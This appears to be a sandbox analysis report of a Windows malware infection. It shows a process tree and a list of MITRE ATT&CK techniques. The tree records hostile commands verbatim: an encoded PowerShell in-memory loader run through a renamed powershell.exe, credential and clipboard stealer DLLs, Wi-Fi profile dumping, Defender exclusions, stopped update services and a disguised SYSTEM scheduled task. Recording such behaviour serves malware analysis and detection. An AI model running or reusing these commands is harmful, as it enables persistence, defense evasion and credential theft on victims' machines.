  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\1000075020\austreamcmd.cmd""
      4⤵
      PID:2428
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        5⤵
        
        PID:2748
    - - C:\Windows\system32\xcopy.exe
        
        xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Znhguqzxljx.png
        5⤵
        
        PID:2560
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\1000075020\austreamcmd.cmd"
        5⤵
        
        PID:1628
      - C:\Windows\system32\xcopy.exe
        
        xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Znhguqzxljx.png
        6⤵
        
        PID:2188
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        6⤵
        
        PID:2920
      - C:\Windows\system32\xcopy.exe
        
        xcopy /d /q /y /h /i C:\Users\Admin\AppData\Roaming\1000075020\austreamcmd.cmd C:\Users\Admin\AppData\Local\Temp\Znhguqzxljx.png.bat
        6⤵
        
        PID:2128
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        6⤵
        
        PID:2388
      - C:\Users\Admin\AppData\Local\Temp\Znhguqzxljx.png
        
        C:\Users\Admin\AppData\Local\Temp\Znhguqzxljx.png -win 1 -enc JABZAHYAZgBvAGoAbQB4AG8AZgB1ACAAPQAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEwAaQBuAGUAcwAoACgAKABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQApAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAC4AYgBhAHQAIgApACwAIABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAGwAYQBzAHQAIAAxADsAIAAkAE4AegBsAGYAZwBtAGYAbAB5AHEAZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABZAHYAZgBvAGoAbQB4AG8AZgB1ACkAOwAkAFEAYQBvAHoAYwB1AGoAZwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABOAHoAbABmAGcAbQBmAGwAeQBxAGcAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAVABqAGQAZwByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFEAYQBvAHoAYwB1AGoAZwBzACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABUAGoAZABnAHIALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAFQAagBkAGcAcgAuAEMAbABvAHMAZQAoACkAOwAkAFEAYQBvAHoAYwB1AGoAZwBzAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQATgB6AGwAZgBnAG0AZgBsAHkAcQBnACAAPQAgACQAbwB1AHQAcAB1AHQALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAE4AegBsAGYAZwBtAGYAbAB5AHEAZwApADsAIAAkAEEAcQB4AGkAZwBoAGsAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQATgB6AGwAZgBnAG0AZgBsAHkAcQBnACkAOwAgACQAUwBpAHoAYwBsAHYAcQB3ACAAPQAgACQAQQBxAHgAaQBnAGgAawAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAFgAYwBwAG8AdwBxAGkAIAA9ACAAJABTAGkAegBjAGwAdgBxAHcALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
      4⤵
      Loads dropped DLL
      PID:2544
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:2832
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        
        PID:3268
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      PID:824
  - - C:\Users\Admin\AppData\Roaming\1000077000\amers.exe
      "C:\Users\Admin\AppData\Roaming\1000077000\amers.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:1980
    - - C:\Users\Admin\AppData\Roaming\1000077000\amers.exe
        
        C:\Users\Admin\AppData\Roaming\1000077000\amers.exe
        5⤵
        Executes dropped EXE
        
        PID:3512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2976
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:3504
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3524
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3536
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3548
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3560
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3600
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:3792
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3588
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3644
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3720
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3728
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3756
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3404
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:936
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2688
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3424
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1764
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2776
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3476
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:2748
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3484
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3428
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:552
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:820
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3516
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:1608
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3928

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231101054025.log C:\Windows\Logs\CBS\CbsPersist_20231101054025.cab
1⤵
- Drops file in Windows directory
PID:1944

C:\Windows\system32\taskeng.exe
taskeng.exe {E8952BD0-E113-48A2-9DE9-07829BC23F85} S-1-5-21-3425689832-2386927309-2650718742-1000:AWDHTXES\Admin:Interactive:[1]
1⤵
PID:2192
- C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
  C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
  2⤵
  - Executes dropped EXE
  PID:868
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  2⤵
  - Executes dropped EXE
  PID:3056
- C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
  C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
  2⤵
  - Executes dropped EXE
  PID:3376
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  2⤵
  - Executes dropped EXE
  PID:3384
- C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
  C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
  2⤵
  - Executes dropped EXE
  PID:4084
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  2⤵
  - Executes dropped EXE
  PID:4088
- C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
  C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
  2⤵
  - Executes dropped EXE
  PID:1760
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  2⤵
  PID:2556

C:\Windows\system32\taskeng.exe
taskeng.exe {5A703D8E-1474-4430-B9CC-26FD170F5BB3} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:772
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3112

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
PID:2420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery